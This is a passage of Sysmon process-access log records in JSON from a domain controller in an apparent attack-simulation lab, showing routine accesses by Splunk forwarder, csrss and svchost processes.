{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6041,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03EA-5F25-0000-001013160B00}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03EA-5F25-0000-001013160B00}","TargetProcessId":"4644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6042,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03EA-5F25-0000-001013160B00}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03EA-5F25-0000-001013160B00}","TargetProcessId":"4644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6043,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6044,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6045,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6046,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6047,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6048,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:54.569","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6049,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:54.569\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 